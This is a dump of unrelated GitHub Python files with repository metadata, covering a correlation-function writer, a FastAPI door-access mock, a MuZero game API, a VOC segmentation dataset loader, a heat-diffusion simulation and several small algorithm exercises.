outname='xi_n%d_m%d_periodic_12.dat'%(nrbins,nmu_bins)\n with open(os.path.join(outdir, outname), "w+") as outfile:\n for r in mean_bins:\n outfile.write("%.8e "%r)\n outfile.write("\\n")\n for mu in mean_mus:\n outfile.write("%.8e "%mu)\n outfile.write("\\n");\n for i in range(nrbins):\n for j in range(nmu_bins):\n outfile.write("%.8e "%xi_reshape12[i,j])\n outfile.write("\\n")\n\n print("Cross correlation function written successfully to %s"%(outdir+outname))\n\n\n outname='xi_n%d_m%d_periodic_22.dat'%(nrbins,nmu_bins)\n with open(os.path.join(outdir, outname), "w+") as outfile:\n for r in mean_bins:\n outfile.write("%.8e "%r)\n outfile.write("\\n")\n for mu in mean_mus:\n outfile.write("%.8e "%mu)\n outfile.write("\\n");\n for i in range(nrbins):\n for j in range(nmu_bins):\n outfile.write("%.8e "%xi_reshape2[i,j])\n outfile.write("\\n")\n\n print("Second field correlation function written successfully to %s"%(outdir+outname))\n\nif multifield:\n print("NB: Number of galaxies is (%d, %d)"%(N_gal,N_gal2))\nelse:\n print("NB: Number of galaxies is %d"%N_gal)\n","repo_name":"oliverphilcox/RascalC","sub_path":"python/xi_estimator_periodic.py","file_name":"xi_estimator_periodic.py","file_ext":"py","file_size_in_byte":7485,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"}
+{"seq_id":"204911991","text":"from math import log2, ceil\n\nupper = list(map(int, input().split()))\n\nattempts = sum([ceil(log2(i)) for i in upper]) + 1\ncount = 0\n\nlower = [1, 1, 1]\n\nmiddle = upper[:]\n\nfor i in range(3):\n while upper[i] > lower[i]:\n middle[i] = (upper[i] + lower[i]) // 2\n print("?", ' '.join((map(str, lower))), ' '.join((map(str, middle))))\n count += 1\n if (input() == "found"):\n upper[i] = middle[i]\n else:\n lower[i] = middle[i] + 1\n middle[i] = (upper[i] + lower[i]) // 2\n\nwhile count < attempts - 1:\n print("? 1 1 1 1 1 1")\n count += 1\n input()\n\nprint("!", ' '.join((map(str, lower))))\n","repo_name":"Sakamoto45/Semestr_8","sub_path":"blind_prog/scanner/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"39359249956","text":"from datetime import datetime, time\nfrom typing import Optional\n\nfrom fastapi import FastAPI, HTTPException\n\n\nDOORS = [\n {\n \"id\": 1,\n \"name\": \"Front Door\",\n \"ip_address\": \"192.168.1.1\",\n },\n {\n \"id\": 2,\n \"name\": \"Back Door\",\n \"ip_address\": \"192.168.1.2\",\n },\n]\n\nTAGS = [\n {\n \"id\": 1,\n \"number\": \"FFFFF7\",\n \"enabled\": True,\n },\n {\n \"id\": 2,\n \"number\": \"FDF7DF\",\n \"enabled\": False,\n },\n {\n \"id\": 3,\n \"number\": \"FFB7EF\",\n \"enabled\": True,\n },\n {\n \"id\": 4,\n \"number\": \"EFB77E\",\n \"enabled\": True,\n },\n]\n\nSCHEDULES = [\n {\n \"id\": 1,\n \"door_id\": 1,\n \"tag_id\": 1,\n \"start\": time(hour=0, minute=0, second=0),\n \"end\": time(hour=23, minute=59, second=59),\n }, \n {\n \"id\": 2,\n \"door_id\": 1,\n \"tag_id\": 3,\n \"start\": time(hour=9, minute=0, second=0),\n \"end\": time(hour=17, minute=0, second=0),\n }, \n {\n \"id\": 3,\n \"door_id\": 2,\n \"tag_id\": 4,\n \"start\": time(hour=18, minute=0, second=0),\n \"end\": time(hour=23, minute=0, second=0),\n }, \n]\n\nACCESS_LOGS = [\n]\n\n\napp = FastAPI()\n\n@app.get(\"/doors\")\ndef read_doors():\n return DOORS\n\n@app.get(\"/doors/{door_id}\")\ndef read_door(door_id: int):\n try:\n return [d for d in DOORS if d['id'] == door_id][0]\n except IndexError:\n raise HTTPException(status_code = 404, detail= \"Id not found\")\n\n@app.get(\"/tags\")\ndef read_tags():\n return TAGS\n\n@app.get(\"/tags/{tag_id}\")\ndef read_tag(tag_id: int):\n try:\n return [t for t in TAGS if t['id'] == tag_id][0]\n except IndexError:\n raise HTTPException(status_code = 404, detail= \"Id not found\")\n\n@app.get(\"/schedules\")\ndef read_schedules(door_id: Optional[int]=None, tag_id: Optional[int]=None):\n if door_id == None and tag_id == None: return SCHEDULES\n if door_id == None: return [s for s in SCHEDULES if s['tag_id'] == tag_id]\n if tag_id == None: return [s for s in SCHEDULES if s['door_id'] == door_id]\n return [s for s in SCHEDULES if s['door_id'] == door_id and s['tag_id'] == tag_id]\n\n@app.get(\"/schedules/{schedule_id}\")\ndef read_schedule(schedule_id: int):\n try:\n return [t for t in SCHEDULES if t['id'] == schedule_id][0]\n except IndexError:\n raise HTTPException(status_code = 404, detail= \"Id not found\")\n\n@app.get(\"/access_logs\")\ndef read_access_logs():\n return ACCESS_LOGS\n\n@app.post(\"/access_logs\")\ndef write_access_log(tag_id: str, granted: bool, door_id: Optional[int]=None, timestamp: Optional[datetime]=None):\n \"\"\"\n - **door_id:** if not provided, `door_id` is determined by the requesting IP address.\n - **timestamp:** if not provided, the date and time when the request is made is used.\n \"\"\"\n # This would normally lookup door based on the source IP of the request.\n if door_id == None: door_id = 1\n # Resolve the default here so each request gets the current time (a datetime.now() default argument would be evaluated only once, at import time).\n if timestamp == None: timestamp = datetime.now()\n ACCESS_LOGS.append({\n \"tag_id\": tag_id,\n \"door_id\": door_id,\n \"granted\": granted,\n \"timestamp\": timestamp,\n })\n","repo_name":"amorphitec/amorphitec-cloud","sub_path":"aiqua-optimus/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"11519162199","text":"\"\"\"\nGiven a string, find the longest palindromic contiguous substring. \nIf there are more than one with the maximum length, return any one.\n\nFor example, the longest palindromic substring of \"aabcdcb\" is \"bcdcb\". \nThe longest palindromic substring of \"bananas\" is \"anana\".\n\n\n\"\"\"\ndef longest_palindrome(s):\n list1 = []\n longest = ''\n for i in range(len(s)):\n for j in range(1, len(s)+1):\n substring = s[i:j]\n if (substring[::-1] == substring) and len(substring) > len(longest):\n longest = substring\n list1.append(longest)\n \n return list1 , longest\n\n\nsub =\"aabcdcb\" \nprint(longest_palindrome(sub))","repo_name":"laxmimaha/Daily_coding","sub_path":"problem46.py","file_name":"problem46.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"42996581951","text":"# Definition for singly-linked list with a random pointer.\nclass RandomListNode(object):\n def __init__(self, x):\n self.label = x\n self.next = None\n self.random = None\n\nclass Solution(object):\n def copyRandomList(self, head):\n \"\"\"\n :type head: RandomListNode\n :rtype: RandomListNode\n \"\"\"\n newList = RandomListNode(-1)\n tail = newList\n dic = {}\n temp = head\n while temp != None:\n newNode = RandomListNode(temp.label)\n dic[id(temp)] = newNode\n \n temp = temp.next\n tail.next = newNode\n tail = newNode\n temp = head\n tail = newList.next\n while temp != None:\n if temp.random != None:\n tail.random = dic[id(temp.random)]\n temp = temp.next\n tail = tail.next\n return newList.next","repo_name":"zhuango/leetCode","sub_path":"PythonForLeetCode/138_CopyListwithRandomPointer.py","file_name":"138_CopyListwithRandomPointer.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"}
+{"seq_id":"6639919092","text":"#program 1#\n\ndef somme_produits(t1,t2):\n somme=0\n for a in t1:\n for b in t2:\n somme = somme + a * b\n return somme\n\n#program 2#\n\ndef produits_sommes(t1,t2):\n somme1=0\n somme2=0\n for a in t1:\n somme1 = somme1 + a\n for b in t2:\n somme2 = somme2 + b\n return somme1 * somme2","repo_name":"TREMOUILLEThomas/P7","sub_path":"ex111.py","file_name":"ex111.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2706224631","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef time_evolution(T,a,domain):\n dt = 1e-4 #Choose the time step wisely. Check notes. 
If its more than a certain value solution diverges\n t = 0\n D = 4.25e-6\n\n fig,p = plt.subplots(1,5)\n\n p[0].plot(domain,T)\n p[0].set_title(\"t = 0\")\n\n temp = T.copy()\n while t<=0.01:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[1].plot(domain,T)\n p[1].set_title(\"t = 0.01\")\n\n while t<=0.1:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[2].plot(domain,T)\n p[2].set_title(\"t = 0.1\")\n\n while t<=0.4:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[3].plot(domain,T)\n p[3].set_title(\"t = 0.4\")\n\n while t<=1:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[4].plot(domain,T)\n p[4].set_title(\"t = 1\")\n\n fig.tight_layout()\n plt.show()\n\nintervals = int(input(\"Enter number of intervals for discretising x axis: \"))\ngrid = intervals + 1\ntemperature = np.ones(grid)\ninitial_temp_left = int(input(\"Enter initial temperature on the left end of x-axis (in Celcius): \"))\ninitial_temp_right = int(input(\"Enter initial temperature on the right end of x-axis (in Celcius): \"))\ninitial_temp_body = int(input(\"Enter temperature in the metal (in Celcius): \"))\ntemperature = (initial_temp_body+273)*temperature #20+273\ntemperature[0] = initial_temp_left+273 #50+273\ntemperature[len(temperature) - 1] = initial_temp_right+273 #0+273\na = (1/100)/intervals #length in metres between discrete points\ndomain = np.linspace(0,1,grid)*(1/100)\n#print(domain)\ntime_evolution(temperature,a,domain)\n","repo_name":"archibanerj/IITKGP-Computational-Physics-Spring-2021","sub_path":"Solutions/A10/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23951866153","text":"import importlib\nimport re\nimport hashlib\nimport os\nimport numpy\nfrom typing import Optional\nfrom fastapi import Body, FastAPI, HTTPException\nfrom games.abstract_game import AbstractGame\nfrom self_play_replicate import SelfPlayReplicate\nfrom replication import Replication\n\napp = FastAPI()\n\ndef get_hash_for_model(file_name: str) -> str:\n h = hashlib.md5()\n with open(file_name, 'rb') as f:\n fb = f.read()\n while len(fb) > 0:\n h.update(fb)\n fb = f.read()\n\n return h.hexdigest()\n\ndef get_game_module(game_name: str):\n if not re.match('^[a-zA-Z][a-zA-Z0-9_]*$', game_name):\n raise HTTPException(status_code=404, detail=f\"The game_name '{game_name}' is invalid.\")\n \n try:\n return importlib.import_module(\"games.\" + game_name)\n except ModuleNotFoundError as err:\n raise HTTPException(status_code=404, detail=f\"The game_name '{game_name}' is not found.\")\n\n@app.get(\"/game/{game_name}\")\ndef game_info(game_name: str):\n game_module = get_game_module(game_name)\n replicate = SelfPlayReplicate(game_module, 0)\n\n return {\n \"action_space\": replicate.config.action_space,\n \"players\": replicate.config.players,\n }\n\n\n@app.get(\"/game/{game_name}/{seed}\")\ndef first_game_status(game_name: str, seed: int):\n game_module = get_game_module(game_name)\n replicate = SelfPlayReplicate(game_module, seed)\n observation = replicate.replicate_game([])\n\n return {\n \"observation\": numpy.array(observation).tolist(),\n \"next\": replicate.game.to_play(),\n \"legal\": replicate.game.legal_actions(),\n 
}\n\n@app.put(\"/game/{game_name}/{seed}/action\")\ndef calculate_game_step(\n game_name: str, seed: int,\n replication: Replication,\n opponent: str, human_action: Optional[int] = None,\n temperature: Optional[float] = 0, temperature_threshold: Optional[float] = 0,\n preffered_model_hash: Optional[str] = None\n):\n if not opponent in ['self', 'random', 'expert', 'human']:\n raise HTTPException(status_code=404, detail=f\"The opponent '{opponent}' is invalid.\")\n\n if (opponent == 'human' and human_action is None \n or opponent != 'human' and human_action is not None\n ):\n raise HTTPException(status_code=400, detail=f\"The opponent is '{opponent}', but human_action is '{human_action}'.\")\n\n file_name = os.getenv(f\"MODEL_PATH_{game_name}\")\n if file_name is None or not os.path.isfile(file_name):\n raise HTTPException(status_code=404, detail=f\"The model for game_name '{game_name}' is not found.\")\n\n actual_hash = get_hash_for_model(file_name)\n if preffered_model_hash is not None and actual_hash != preffered_model_hash:\n raise HTTPException(status_code=400, detail=f\"Prefferd hash code is wrong. hash was '{actual_hash}'.\")\n\n game_module = get_game_module(game_name)\n replicate = SelfPlayReplicate(game_module, seed, checkpoint_file=file_name)\n checkpoint = replicate.checkpoint\n\n try:\n replicate_buffer = [\n (step['action'], step['root'], step['next']) for step in replication.steps\n ]\n except TypeError:\n raise HTTPException(status_code=400, detail=f\"Cannot perse the replica steps\")\n except KeyError:\n raise HTTPException(status_code=400, detail=f\"Cannot perse the replica steps\")\n\n if not all([\n action in replicate.config.action_space\n and (root is None or isinstance(root, float) or isinstance(root, int))\n and player in replicate.config.players\n for (action, root, player) in replicate_buffer\n ]):\n raise HTTPException(status_code=400, detail=f\"The replica steps are including wrong value(s).\")\n\n try:\n replicate.replicate_game(replicate_buffer)\n except ValueError as err:\n raise HTTPException(status_code=400, detail=f\"An error occurred while replicating game history: {err}\")\n\n try:\n action, action_str, observation = replicate.add_action(\n opponent,\n temperature=temperature, temperature_threshold=temperature_threshold,\n human_action=human_action)\n except ValueError as err:\n raise HTTPException(status_code=400, detail=f\"An error occurred while processing action: {err}\")\n \n return {\n \"model_hash\": actual_hash,\n \"observation\": numpy.array(observation).tolist(),\n \"next\": replicate.game.to_play(),\n \"legal\": replicate.game.legal_actions(),\n \"action\": {\n \"number\": action,\n \"text\": action_str,\n },\n \"done\": replicate.done,\n \"steps\": [{\n 'action': action,\n 'root': root,\n 'next': player,\n } for (action, root, player) in replicate.get_history_buffer()],\n }\n","repo_name":"ssashir06/muzero-http-service","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73289825104","text":"from fritzinfluxdb.classes.fritzbox.service_definitions import lua_services\n\nread_interval = 150\n\n\ndef prepare_json_response_data(response):\n \"\"\"\n handler to prepare returned json data for parsing\n \"\"\"\n\n return response.json()\n\n\nlua_services.append(\n {\n \"name\": \"System Stats\",\n \"os_min_versions\": \"7.29\",\n \"method\": \"POST\",\n \"params\": {\n \"page\": \"ecoStat\",\n \"lang\": 
\"de\"\n },\n \"response_parser\": prepare_json_response_data,\n \"interval\": read_interval,\n \"value_instances\": {\n \"cpu_temp\": {\n \"data_path\": \"data.cputemp.series.0.-1\",\n \"type\": int\n },\n \"cpu_utilization\": {\n \"data_path\": \"data.cpuutil.series.0.-1\",\n \"type\": int\n },\n \"ram_usage_fixed\": {\n \"data_path\": \"data.ramusage.series.0.-1\",\n \"type\": int\n },\n \"ram_usage_dynamic\": {\n \"data_path\": \"data.ramusage.series.1.-1\",\n \"type\": int\n },\n \"ram_usage_free\": {\n \"data_path\": \"data.ramusage.series.2.-1\",\n \"type\": int\n }\n }\n })\n\nlua_services.append(\n {\n \"name\": \"Energy Stats\",\n \"os_min_versions\": \"7.29\",\n \"method\": \"POST\",\n \"params\": {\n \"page\": \"energy\",\n \"lang\": \"de\"\n },\n \"response_parser\": prepare_json_response_data,\n \"interval\": read_interval,\n \"value_instances\": {\n \"energy_consumption\": {\n \"data_path\": \"data.drain\",\n \"type\": list,\n \"next\": {\n # data struct type: dict\n \"type\": int,\n \"tags_function\": lambda data: {\"name\": data.get(\"name\")},\n \"value_function\": lambda data: data.get(\"actPerc\"),\n \"exclude_filter_function\": lambda data: \"lan\" in data.keys()\n }\n }\n }\n })\n","repo_name":"bb-Ricardo/fritzinfluxdb","sub_path":"fritzinfluxdb/classes/fritzbox/service_definitions/system_stats.py","file_name":"system_stats.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"48"} +{"seq_id":"29682367626","text":"#Permet de travailler sur le nombre généré et non sur une liste\n#Meilleurs performance et gestion de la mémoire. \n\ndef fibonacci_generator():\n current, nxt = 0,1\n while True:\n current, nxt = nxt, nxt + current\n yield current\n\ndef main():\n for m in fibonacci_generator():\n print(m,end=', ')\n print()\n\nif __name__==\"__main__\":\n main()\n \n","repo_name":"TuxStory/Python3","sub_path":"yield_fibonacci.py","file_name":"yield_fibonacci.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15738220150","text":"import requests\nfrom db import SmartPhoneDB\n\nurl = \"http://127.0.0.1:8000/add_product/\"\ndb = SmartPhoneDB()\ntables = list(db.get_tables())\n# i = 0\nfor i in tables:\n for product in db.get_all(i):\n name = product['brend']\n brend = product['model']\n price = round(float(''.join(product['price'].split()[:-1]))/11350, 2)\n color = product['color']\n ram = product['ram']\n memory = product['memory']\n img = product['img_url']\n if len(name) < 7:\n name = f\"{brend} {name}\"\n \n data = {\n \"name\":name,\n \"color\":color,\n \"brend\":brend,\n \"price\": price,\n \"ram\": int(ram),\n \"memory\": int(memory),\n \"img\": img\n }\n\n response = requests.post(url, json=data)\n print(response.json())\n # break","repo_name":"JavohirJalilov/django-client-smartphone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34312925705","text":"from datetime import date\nfrom conexion_postgresql import crea_tabla_categoria, crea_tabla_cine, crea_tabla_fuente, crea_tabla_general, crea_tabla_provincia_categoria, inserta_tabla_categoria, inserta_tabla_cine, inserta_tabla_fuente, inserta_tabla_general, inserta_tabla_provincia_categoria\n\n# funcion para actualizar toda la tabla consolidada con los datos generales del proyecto\ndef 
actualizar_tabla_general(general):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_general()\n fecha = str(date.today())\n for row in general:\n if row[7] == \"\": row[7]= None\n if row[8] == \"\": row[8]= None\n if row[9] == \"\": row[9]= None\n if row[10] == \"\": row[10]= None\n if row[11] == \"\": row[11]= None\n localidad = str(row[5]).replace(\"'\",\"_\")\n nombre = str(row[6]).replace(\"'\",\"_\")\n direccion = str(row[7]).replace(\"'\",\"_\")\n datos = [row[0],row[1],row[2],row[3],row[4],localidad,nombre,direccion,row[8],row[9],row[10],row[11],fecha]\n inserta_tabla_general(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de catregoría del proyecto\ndef actualiza_tabla_categoria(categoria):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_categoria()\n fecha = str(date.today())\n for key in categoria:\n datos = [key, categoria[key],fecha]\n inserta_tabla_categoria(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de fuente del proyecto\ndef actualiza_tabla_fuente(fuente):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_fuente()\n fecha = str(date.today())\n for key in fuente:\n datos = [key, fuente[key],fecha]\n inserta_tabla_fuente(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de provincia y categoría del proyecto\ndef actualiza_tabla_provincia_categoria(provincia_categoria):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_provincia_categoria()\n fecha = str(date.today())\n for key in provincia_categoria:\n row = str(key)\n row = row.split(\" - \")\n datos = [row[0],row[1],provincia_categoria[key],fecha]\n inserta_tabla_provincia_categoria(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de los cines del proyecto\ndef actualiza_tabla_cine(cine):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_cine()\n fecha = str(date.today())\n for row in cine:\n datos = [row[0],row[1],row[2],row[3],fecha]\n inserta_tabla_cine(datos)\n\n","repo_name":"JuanMVicente/Alkemy","sub_path":"src/actualizar_sql.py","file_name":"actualizar_sql.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9711086856","text":"# By submitting this assignment, I agree to the following:\r\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do.\"\r\n# \"I have not given or received any unauthorized aid on this assignment.\"\r\n#\r\n# Names: Daniel Mireles\r\n# Jordan Nguyen\r\n# Tan Nguyen\r\n# Fern Moreno\r\n# Section: 540\r\n# Assignment: 4b - 4\r\n# Date: 19 September 2019\r\n\r\n#This program outputs the root(s) of the quadratic equation given inputs from the user.\r\n\r\nimport cmath\r\n\r\nA = float(input(\"Please input your A value here: \"))\r\nB = float(input(\"Please input your B value here: \"))\r\nC = float(input(\"Please input your C value here: \"))\r\n\r\nD = (B**2) - (4*A*C)\r\n\r\nroot_1 = (-B-cmath.sqrt(D))/(2*A)\r\nroot_2 = (-B+cmath.sqrt(D))/(2*A)\r\nprint()\r\nprint(\"The roots are\", root_1, \"and\", root_2)","repo_name":"DannyMireles/Python","sub_path":"Lab4_Act4.py","file_name":"Lab4_Act4.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9675430906","text":"def 
kth_permutation(n,k):\n permutation = []\n unused = list(range(1,n+1))\n fact = [1]*(n+1)\n for i in range(1, n+1):\n fact[i] = i*fact[i-1]\n k -=1 \n while n > 0:\n part_length = fact[n]//n\n i = k//part_length\n permutation.append(unused[i])\n unused.pop(i)\n n -= 1\n k %= part_length\n return print(''.join(map(str,permutation)))\n\nkth_permutation(n=5,k=20)\n\n\n\"\"\" def contains_all(freq1,freq2):\n for ch in freq2:\n if freq1[ch] < freq2[ch]:\n return True \"\"\"\n\n","repo_name":"rangaomkaram/Python_DataStructures","sub_path":"permutation_k.py","file_name":"permutation_k.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32989198081","text":"#!/usr/bin/env python\nimport argparse\nimport sys\nimport warnings\n\nsys.path.append(\".\")\nfrom modules.individual import IndividualActivityRecognition\n\nwarnings.simplefilter(\"ignore\")\n\n\ndef parser():\n parser = argparse.ArgumentParser()\n\n # requires\n parser.add_argument(\n \"-dd\",\n \"--data_dir\",\n required=True,\n type=str,\n help=\"path of input data\",\n )\n parser.add_argument(\n \"-sl\",\n \"--seq_len\",\n required=True,\n type=int,\n help=\"sequential length\",\n )\n\n # options\n parser.add_argument(\n \"-g\", \"--gpus\", type=int, nargs=\"*\", default=None, help=\"gpu ids\"\n )\n parser.add_argument(\n \"-mt\",\n \"--model_type\",\n type=str,\n default=\"ganomaly\",\n help=\"'ganomaly', 'role_estimation\",\n )\n parser.add_argument(\n \"-dt\",\n \"--data_type\",\n type=str,\n default=\"local\",\n help=\"'ganomaly': Input data type. Selected by 'global', 'local', or 'both', by defualt is 'local'.\",\n )\n parser.add_argument(\n \"-msk\",\n \"--masking\",\n default=False,\n action=\"store_true\",\n help=\"'ganomaly': Masking low confidence score keypoints\",\n )\n parser.add_argument(\n \"-an\",\n \"--annotation_path\",\n type=str,\n default=None,\n help=\"'role_estimation': annotation file path\",\n )\n\n args = parser.parse_args()\n\n # delete last slash\n args.data_dir = args.data_dir[:-1] if args.data_dir[-1] == \"/\" else args.data_dir\n\n args.model_type = args.model_type.lower()\n\n return args\n\n\ndef main():\n args = parser()\n\n iar = IndividualActivityRecognition(\n args.model_type,\n args.seq_len,\n data_type=args.data_type,\n masking=args.masking,\n stage=\"train\",\n )\n iar.train(args.data_dir, args.gpus, annotation_path=args.annotation_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kojikojiprg/individual_anomaly","sub_path":"tools/train_individual.py","file_name":"train_individual.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13001556578","text":"import sys\nsys.stdin = open(\"D5_3462_input.txt\", \"r\")\n\nnum = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]\nT = int(input())\nfor test_case in range(T):\n A, B = map(int, input().split())\n A, B = A / 100, B / 100\n PA, PB = 0, 0\n\n for i in range(31):\n if i not in num:\n a = pow(1 - A, 30 - i) * pow(A, i)\n b = pow(1 - B, 30 - i) * pow(B, i)\n combi = 1\n for j in range(i):\n combi *= (30 - j) / (1 + j)\n PA += a * combi\n PB += b * combi\n print(\"#{} {}\".format(test_case + 1, \"%0.5f\" % (1 - PA * PB)))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D5_3462.py","file_name":"D5_3462.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
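The D5_3462 record above builds each binomial coefficient C(30, i) as a running product (combi *= (30 - j) / (1 + j)) before weighting it by the success and failure probabilities. A minimal, self-contained sketch of the same binomial probability term using math.comb follows; the function name binomial_term and the example values are illustrative and not part of the original record:

from math import comb

def binomial_term(n: int, k: int, p: float) -> float:
    # P(X = k) for X ~ Binomial(n, p): C(n, k) * p^k * (1 - p)^(n - k)
    return comb(n, k) * p**k * (1 - p) ** (n - k)

# e.g. the i = 3 term for 30 trials with success probability 0.25:
print(binomial_term(30, 3, 0.25))  # ~ 0.0269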
+{"seq_id":"32295318106","text":"import tarfile\r\nimport urllib\r\nimport PIL\r\nimport os\r\nimport numpy\r\nimport torch\r\nimport albumentations as A\r\n\r\nclass VOCdataset:\r\n def __init__(self, split='train', root='datasets',\r\n aug=A.Compose([\r\n A.PadIfNeeded(min_height=256, min_width=256),\r\n A.RandomCrop(height=256, width=256),\r\n A.HorizontalFlip(p=0.5),\r\n A.RandomBrightnessContrast(p=0.2),\r\n A.ShiftScaleRotate(p=0.5),\r\n A.HueSaturationValue(hue_shift_limit=0.2, sat_shift_limit=0.2, val_shift_limit=0.2, p=0.5),\r\n A.RGBShift(r_shift_limit=15, g_shift_limit=15, b_shift_limit=15, p=0.5),\r\n A.Blur(blur_limit=3)\r\n ])):\r\n self.root = root\r\n self.aug = aug\r\n tar_path = os.path.join(root, 'VOC/VOC.zip')\r\n dir_path = os.path.join(root, 'VOC')\r\n if not os.path.exists(dir_path):\r\n os.makedirs(dir_path)\r\n url = \"http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCtrainval_11-May-2012.tar\"\r\n with open(tar_path, 'wb+') as fout:\r\n fout.write(urllib.request.urlopen(url).read())\r\n fout.close()\r\n\r\n if os.path.exists(tar_path):\r\n with tarfile.open(tar_path) as tar_ref:\r\n tar_ref.extractall(dir_path)\r\n\r\n os.remove(tar_path)\r\n\r\n self.images = []\r\n for line in open(os.path.join(dir_path, 'VOCdevkit', 'VOC2012',\r\n 'ImageSets', 'Segmentation',\r\n split + '.txt')):\r\n self.images.append(line.strip())\r\n\r\n def __len__(self):\r\n return len(self.images)\r\n\r\n def __getitem__(self, index):\r\n img_name = self.images[index]\r\n img_path = os.path.join(self.root, 'VOC', 'VOCdevkit', 'VOC2012',\r\n 'JPEGImages', img_name + '.jpg')\r\n seg_path = os.path.join(self.root, 'VOC', 'VOCdevkit', 'VOC2012',\r\n 'SegmentationClass', img_name + '.png')\r\n img = numpy.array(PIL.Image.open(img_path))\r\n seg = numpy.array(PIL.Image.open(seg_path))\r\n\r\n res = self.aug(image=img, mask=seg)\r\n\r\n img = torch.tensor(res['image']).permute(2, 0, 1)\r\n seg = torch.tensor(res['mask'])\r\n seg[seg == 255] = 0\r\n\r\n return {'image': img.float() / 255.0, 'seg': seg.long()}\r\n","repo_name":"pleteneva/VOC_segmentation","sub_path":"VOCDataset.py","file_name":"VOCDataset.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14277130437","text":"import matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib import pyplot\n\nmachine_count = [18, 4, 2]\nmachine_name = [\"PC\", \"MAC\", \"Linux\"]\npyplot.pie(machine_count, labels = machine_name, autopct = \"%.2f%%\", shadow = True, explode = [0, 0.2, 0])\npyplot.title(\"PC vs MAC vs Linux Usage\")\npyplot.axis(\"equal\")\npyplot.show()","repo_name":"NguyenNamDan/nguyennamdan-labs-c4e23","sub_path":"lab1/hw/study2.py","file_name":"study2.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24567445608","text":"#### import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# find source\ndICOMReaderdirectory1 = FindSource('DICOMReaderdirectory1')\n\n# create a new 'Threshold'\nthreshold1 = Threshold(Input=dICOMReaderdirectory1)\nthreshold1.Scalars = ['POINTS', 'DICOMImage']\n# show only DOSE\nthreshold1.ThresholdRange = [4000.0, 7622.0]\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n\n# get color transfer function/color map for 'DICOMImage'\ndICOMImageLUT = 
